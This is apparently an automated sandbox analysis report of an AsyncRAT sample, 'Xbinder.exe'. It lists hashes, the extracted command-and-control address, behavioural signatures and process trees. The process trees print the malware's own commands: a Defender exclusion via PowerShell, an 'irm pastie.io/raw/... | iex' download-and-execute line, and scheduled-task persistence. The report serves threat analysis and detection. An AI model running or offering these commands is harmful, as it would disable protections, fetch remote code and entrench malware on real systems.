asyncrat | 5b33e729c1b06179513baa7af574be4e43fab620da2eb35727dfde4626400070

Analysis

max time kernel
19s
max time network
40s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-01-2025 00:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xbinder.exe
Size

818KB
MD5

e8b3e6a05918c40c6496f0ac7570164d
SHA1

a23028177074a8b162e238deb4f6bd7663e09b96
SHA256

5b33e729c1b06179513baa7af574be4e43fab620da2eb35727dfde4626400070
SHA512

2ecfe3dfea8af97195eb2e50fd76973df5a3294ee75fbb5f588640db8e009ea905f12958cca58283291c31b4ecd55af645adfd9de6bea07814334e8ba154f084
SSDEEP

24576:9RooZwBjEhcYcvYWUb1r/rjVJbC7vztZJIS002Kgp/nn6V9g:LXwBjXQWUd7qx0Zns

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 2636 created 428	2636	Stub.exe	5
PID 2192 created 428	2192	Stub.exe	5
PID 2704 created 428	2704	Stub.exe	5
PID 1700 created 428	1700	Stub.exe	5
PID 2068 created 428	2068	Stub.exe	5
PID 1760 created 428	1760	Stub.exe	5

Async RAT payload 9 IoCs

rat

resource	yara_rule
behavioral1/files/0x0007000000004e74-13.dat	family_asyncrat
behavioral1/memory/2636-204-0x0000000000530000-0x0000000000542000-memory.dmp	family_asyncrat
behavioral1/memory/2192-394-0x0000000000960000-0x0000000000972000-memory.dmp	family_asyncrat
behavioral1/memory/2704-538-0x0000000000610000-0x0000000000622000-memory.dmp	family_asyncrat
behavioral1/memory/1700-843-0x0000000000630000-0x0000000000642000-memory.dmp	family_asyncrat
behavioral1/memory/876-1555-0x00000000006E0000-0x00000000006F2000-memory.dmp	family_asyncrat
behavioral1/memory/1512-2144-0x00000000005F0000-0x0000000000602000-memory.dmp	family_asyncrat
behavioral1/memory/988-2352-0x00000000003E0000-0x00000000003F2000-memory.dmp	family_asyncrat
behavioral1/memory/2708-3157-0x00000000007F0000-0x0000000000802000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2684	powershell.exe
2352	powershell.exe
1260	powershell.exe
744	powershell.exe
1356	powershell.exe
2748	powershell.exe
2956	powershell.exe
2196	powershell.exe
1308	powershell.exe
2240	powershell.exe
2668	powershell.exe
1880	powershell.exe
1700	powershell.exe
372	powershell.exe
1008	powershell.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	Xbinder.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	Xbinder.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	Xbinder.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	Xbinder.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	Xbinder.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	Xbinder.exe

Executes dropped EXE 6 IoCs

pid	Process
2636	Stub.exe
2192	Stub.exe
2704	Stub.exe
1700	Stub.exe
2068	Stub.exe
1760	Stub.exe

Drops file in System32 directory 16 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfh009.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc00A.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc011.dat	WMIADAP.EXE
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	WMIADAP.EXE
File created	C:\Windows\system32\perfc007.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh00A.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh00C.dat	WMIADAP.EXE
File opened for modification	C:\Windows\System32\Tasks\$77Stub.exe	svchost.exe
File created	C:\Windows\system32\perfc00C.dat	WMIADAP.EXE
File created	C:\Windows\system32\PerfStringBackup.TMP	WMIADAP.EXE
File created	C:\Windows\system32\perfh011.dat	WMIADAP.EXE
File created	C:\Windows\System32\Tasks\$77Stub.exe	svchost.exe
File created	C:\Windows\system32\perfh007.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc009.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc010.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh010.dat	WMIADAP.EXE

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2636 set thread context of 2664	2636	Stub.exe	35
PID 2192 set thread context of 1964	2192	Stub.exe	47
PID 2704 set thread context of 1848	2704	Stub.exe	59
PID 1700 set thread context of 2656	1700	Stub.exe	71
PID 2068 set thread context of 3052	2068	Stub.exe	155
PID 1760 set thread context of 1424	1760	Stub.exe	95

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE
File created	C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini	WMIADAP.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 30 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2684	SCHTASKS.exe
1760	SCHTASKS.exe
2456	SCHTASKS.exe
2260	SCHTASKS.exe
1412	SCHTASKS.exe
2440	SCHTASKS.exe
2508	SCHTASKS.exe
1680	SCHTASKS.exe
2436	SCHTASKS.exe
1748	SCHTASKS.exe
996	SCHTASKS.exe
992	SCHTASKS.exe
1704	SCHTASKS.exe
3056	SCHTASKS.exe
1700	SCHTASKS.exe
1740	SCHTASKS.exe
2236	SCHTASKS.exe
2036	SCHTASKS.exe
2888	SCHTASKS.exe
480	SCHTASKS.exe
1940	SCHTASKS.exe
336	SCHTASKS.exe
564	SCHTASKS.exe
1844	SCHTASKS.exe
2196	SCHTASKS.exe
2572	SCHTASKS.exe
3068	SCHTASKS.exe
1904	SCHTASKS.exe
488	SCHTASKS.exe
2364	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2956	powershell.exe
2636	Stub.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
1504	powershell.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2684	powershell.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2664	dllhost.exe
2192	Stub.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1548	powershell.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe
1964	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1168	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2636	Stub.exe
Token: SeDebugPrivilege	2636	Stub.exe
Token: SeDebugPrivilege	2664	dllhost.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2192	Stub.exe
Token: SeDebugPrivilege	2192	Stub.exe
Token: SeDebugPrivilege	1964	dllhost.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	2704	Stub.exe
Token: SeDebugPrivilege	2704	Stub.exe
Token: SeDebugPrivilege	1848	dllhost.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	836	svchost.exe
Token: SeIncreaseQuotaPrivilege	836	svchost.exe
Token: SeSecurityPrivilege	836	svchost.exe
Token: SeTakeOwnershipPrivilege	836	svchost.exe
Token: SeLoadDriverPrivilege	836	svchost.exe
Token: SeRestorePrivilege	836	svchost.exe
Token: SeSystemEnvironmentPrivilege	836	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	836	svchost.exe
Token: SeIncreaseQuotaPrivilege	836	svchost.exe
Token: SeSecurityPrivilege	836	svchost.exe
Token: SeTakeOwnershipPrivilege	836	svchost.exe
Token: SeLoadDriverPrivilege	836	svchost.exe
Token: SeSystemtimePrivilege	836	svchost.exe
Token: SeBackupPrivilege	836	svchost.exe
Token: SeRestorePrivilege	836	svchost.exe
Token: SeShutdownPrivilege	836	svchost.exe
Token: SeSystemEnvironmentPrivilege	836	svchost.exe
Token: SeUndockPrivilege	836	svchost.exe
Token: SeManageVolumePrivilege	836	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	836	svchost.exe
Token: SeIncreaseQuotaPrivilege	836	svchost.exe
Token: SeSecurityPrivilege	836	svchost.exe
Token: SeTakeOwnershipPrivilege	836	svchost.exe
Token: SeLoadDriverPrivilege	836	svchost.exe
Token: SeRestorePrivilege	836	svchost.exe
Token: SeSystemEnvironmentPrivilege	836	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	836	svchost.exe
Token: SeIncreaseQuotaPrivilege	836	svchost.exe
Token: SeSecurityPrivilege	836	svchost.exe
Token: SeTakeOwnershipPrivilege	836	svchost.exe
Token: SeLoadDriverPrivilege	836	svchost.exe
Token: SeRestorePrivilege	836	svchost.exe
Token: SeSystemEnvironmentPrivilege	836	svchost.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	1700	Stub.exe
Token: SeDebugPrivilege	1700	Stub.exe
Token: SeDebugPrivilege	2656	dllhost.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2068	Stub.exe
Token: SeDebugPrivilege	2068	Stub.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1168	Explorer.EXE
1168	Explorer.EXE

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1168	Explorer.EXE
1168	Explorer.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2864	conhost.exe
1516	conhost.exe
1144	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 2956	1980	Xbinder.exe	31
PID 1980 wrote to memory of 2956	1980	Xbinder.exe	31
PID 1980 wrote to memory of 2956	1980	Xbinder.exe	31
PID 1980 wrote to memory of 2636	1980	Xbinder.exe	33
PID 1980 wrote to memory of 2636	1980	Xbinder.exe	33
PID 1980 wrote to memory of 2636	1980	Xbinder.exe	33
PID 1980 wrote to memory of 2792	1980	Xbinder.exe	34
PID 1980 wrote to memory of 2792	1980	Xbinder.exe	34
PID 1980 wrote to memory of 2792	1980	Xbinder.exe	34
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2636 wrote to memory of 2664	2636	Stub.exe	35
PID 2664 wrote to memory of 428	2664	dllhost.exe	5
PID 2664 wrote to memory of 472	2664	dllhost.exe	6
PID 2664 wrote to memory of 484	2664	dllhost.exe	7
PID 2636 wrote to memory of 2324	2636	Stub.exe	36
PID 2636 wrote to memory of 2324	2636	Stub.exe	36
PID 2636 wrote to memory of 2324	2636	Stub.exe	36
PID 2664 wrote to memory of 492	2664	dllhost.exe	8
PID 2664 wrote to memory of 588	2664	dllhost.exe	9
PID 2664 wrote to memory of 664	2664	dllhost.exe	10
PID 2664 wrote to memory of 748	2664	dllhost.exe	11
PID 2664 wrote to memory of 812	2664	dllhost.exe	12
PID 2664 wrote to memory of 836	2664	dllhost.exe	13
PID 2664 wrote to memory of 968	2664	dllhost.exe	15
PID 2664 wrote to memory of 272	2664	dllhost.exe	16
PID 2664 wrote to memory of 1032	2664	dllhost.exe	17
PID 2664 wrote to memory of 1048	2664	dllhost.exe	18
PID 2664 wrote to memory of 1112	2664	dllhost.exe	19
PID 2664 wrote to memory of 1120	2664	dllhost.exe	20
PID 2664 wrote to memory of 1168	2664	dllhost.exe	21
PID 2664 wrote to memory of 1984	2664	dllhost.exe	23
PID 2636 wrote to memory of 2036	2636	Stub.exe	37
PID 2636 wrote to memory of 2036	2636	Stub.exe	37
PID 2636 wrote to memory of 2036	2636	Stub.exe	37
PID 2664 wrote to memory of 1328	2664	dllhost.exe	24
PID 2664 wrote to memory of 1528	2664	dllhost.exe	25
PID 2664 wrote to memory of 2312	2664	dllhost.exe	26
PID 2664 wrote to memory of 2308	2664	dllhost.exe	27
PID 2664 wrote to memory of 2488	2664	dllhost.exe	28
PID 2664 wrote to memory of 2636	2664	dllhost.exe	33
PID 2664 wrote to memory of 2792	2664	dllhost.exe	34
PID 2636 wrote to memory of 2196	2636	Stub.exe	39
PID 2636 wrote to memory of 2196	2636	Stub.exe	39
PID 2636 wrote to memory of 2196	2636	Stub.exe	39
PID 2664 wrote to memory of 2196	2664	dllhost.exe	39
PID 2324 wrote to memory of 1504	2324	cmd.exe	42
PID 2324 wrote to memory of 1504	2324	cmd.exe	42
PID 2324 wrote to memory of 1504	2324	cmd.exe	42
PID 2664 wrote to memory of 2324	2664	dllhost.exe	36
PID 2664 wrote to memory of 2036	2664	dllhost.exe	37
PID 2664 wrote to memory of 2004	2664	dllhost.exe	38
PID 2664 wrote to memory of 2196	2664	dllhost.exe	39
PID 2664 wrote to memory of 1072	2664	dllhost.exe	40
PID 2664 wrote to memory of 996	2664	dllhost.exe	41

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{19fc8e0a-c2b1-4387-900d-8e28ab76def8}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2664
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dc0f30ff-57ce-4760-b5cc-9761c2f2719c}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{49462cd4-fc54-4492-9071-790e61858076}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{595dcfc2-acf6-4e14-b0b5-c9c870ce04ae}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0c9596b6-c534-4098-9a72-54e1c2a8b492}
  2⤵
  PID:3052
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d28fc667-ece7-479b-a4d9-03797ebbf84a}
  2⤵
  PID:1424
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bd1124ac-3751-4d9e-9862-785d2a80ec3f}
  2⤵
  PID:2552
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a3eadba1-7711-4887-972d-b5816758edd2}
  2⤵
  PID:1496
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a19e9c35-ef78-4f73-aceb-67acdba89ad5}
  2⤵
  PID:1684
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ce8f7b3-d5de-49f5-a293-d23688d3c4c0}
  2⤵
  PID:1268
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a1902c6d-5e14-4a12-b992-1d3ce4c9c848}
  2⤵
  PID:3052
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1f62e210-ac9d-40a8-986f-1cc584a53d17}
  2⤵
  PID:2052
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{79fc4510-6f73-407f-a565-439047ac8d0a}
  2⤵
  PID:736
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{59e1c686-5afe-4392-b023-4dd6961daf74}
  2⤵
  PID:832
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{943a68a7-eb0b-4064-8c28-83d53bef6c95}
  2⤵
  PID:1656

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:472
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:588
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1984
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1528
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:664
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1120
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- - \\?\C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T /R
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:2488
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:968
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:272
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1032
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1048
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1112
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1328
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2312
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2308

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:484

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:492

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1168
- C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
  "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
  - - C:\Windows\system32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2036
  - - C:\Windows\system32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2196
- - C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
    "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
    3⤵
    - Drops startup file
    PID:2792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2192
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        
        PID:1552
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548
    - - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2236
    - - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
      "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
      4⤵
      Drops startup file
      PID:1644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:372
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        6⤵
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:996
      - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1904
      - C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1704
    - - C:\Users\Admin\AppData\Local\Temp\Xbinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Xbinder.exe"
        5⤵
        Drops startup file
        
        PID:2532
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196
      - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        7⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1748
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        7⤵
